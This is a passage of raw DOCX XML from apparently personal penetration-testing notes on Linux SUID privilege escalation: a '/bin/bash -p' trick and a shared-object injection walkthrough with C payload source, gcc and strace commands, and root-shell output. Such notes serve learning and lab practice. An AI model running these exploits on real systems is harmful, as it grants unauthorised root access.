        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> SUID.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> | grep -F -f SUIDgtfoBins.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020AC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020AD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020AE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_r9cx2eipua70" w:id="286"/>
      <w:bookmarkEnd w:id="286"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/bash with SUID bit set</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020AF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020B0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="6056076" cy="447415"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="491" name="image485.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image485.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId703"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6056076" cy="447415"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020B1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020B2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From here you would simply type </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/bash -p</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to get root, since this will run /bin/bash with the permissions of the owner of the file, which as you can see from here, is root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020B3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020B4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The -p option in bash preserves the effective user ID (euid) when the shell is started with set-user-ID (SUID) or set-group-ID (SGID) privileges. Without -p, Bash normally drops elevated privileges (e.g., root) for safety when started under SUID. The -p flag tells Bash not to drop those privileges, allowing you to retain root access.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020B5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020B6">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_gpsvq585iljm" w:id="287"/>
      <w:bookmarkEnd w:id="287"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Shared Object Injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020B7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020B8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from Tib3rius SUID Video:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020B9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020BA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="621"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Find SUID/SGID files on the target</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="621"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$ find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2&gt; /dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020BC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="621"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020BD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="621"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-rwsr-sr-x 1 root staff 9861 May 14 2017 /usr/local/bin/suid-so</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020BE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="621"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">…</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020BF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="621"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The suid-so file should execute with root user permissions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="621"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Run strace on the SUID file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020C1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="621"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$ strace /usr/local/bin/suid-so 2&gt;&amp;1 | grep -iE "open|access|no such file"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020C2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="621"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">access("/etc/suid-debug", F_OK) = -1 ENOENT (No such file or directory)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020C3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="621"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020C4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="621"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">open("/home/user/.config/libcalc.so", O_RDONLY) = -1 ENOENT (No such file or directory)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="621"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The libcalc.so shared object could not be found, and the program is looking in our user’s home directory, which we can write to</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020C6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="621"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Create the /home/user/.config directory.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020C7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="621"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Create the file libcalc.c with the following contents:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020C8">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">#include &lt;stdio.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020C9">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">#include &lt;stdlib.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020CA">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">static void inject() __attribute__((constructor));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020CB">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">void inject() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020CC">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="720"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">setuid(0);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020CD">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="720"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">system("/bin/bash -p");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020CE">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020CF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="621"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Compile libcalc.c into /home/user/.config/</w:t>
      </w:r>
      <w:hyperlink r:id="rId704">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">libcalc.so</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020D0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="621"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gcc -shared -fPIC -o /home/user/.config/libcalc.so libcalc.c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020D1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="621"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Run the SUID executable to get a root shell:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020D2">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$ /usr/local/bin/suid-so</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020D3">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Calculating something, please wait...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020D4">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">bash-4.1# id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020D5">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">uid=0(root) gid=1000(user) egid=50(staff) groups=0(root) ..</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020D6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020D7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020D8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_67i544g0iptw" w:id="288"/>
      <w:bookmarkEnd w:id="288"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PATH Environment Variable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020D9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020DA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from Tib3rius SUID Video</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020DB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020DC">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PATH Environment Variable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020DD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="755"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The PATH environment variable contains a list of directories where the shell should try to find programs.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020DE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
